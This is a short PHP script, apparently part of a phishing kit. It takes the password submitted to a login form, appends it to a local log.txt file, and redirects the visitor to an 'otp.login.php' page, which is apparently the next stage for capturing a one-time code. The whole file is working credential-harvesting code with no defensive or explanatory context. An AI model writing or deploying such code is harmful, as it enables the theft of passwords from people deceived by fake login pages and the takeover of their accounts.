1<?php 2 3 file_put_contents("log.txt", "Pass: " . $_POST['login_password'] . "\n", FILE_APPEND); 4header('Location: otp.login.php'); 5exit(); 6